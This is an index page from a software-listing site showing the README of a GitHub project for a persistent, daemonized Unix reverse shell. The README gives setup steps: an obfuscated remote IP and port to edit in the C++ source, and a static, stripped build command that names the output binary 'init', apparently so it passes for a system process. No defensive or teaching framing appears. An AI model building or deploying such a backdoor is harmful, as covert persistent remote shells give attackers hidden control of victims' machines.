Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/sin3point14/unix-reverse-shell


https://github.com/sin3point14/unix-reverse-shell

Last synced: 24 days ago
JSON representation

Awesome Lists containing this project

README

        

### persistent daemonized reverse shell

Change with your public IP and open port in `daemon_shell.cpp`
```c
#define REMOTE_ADDR OBFUSCATE("207.46.148.7")
#define REMOTE_PORT 5069
```

compile with
```bash
g++ daemon_shell.cpp -O3 -march=native -fPIC -g -s -static -o ./init
```

output binary will be named init :)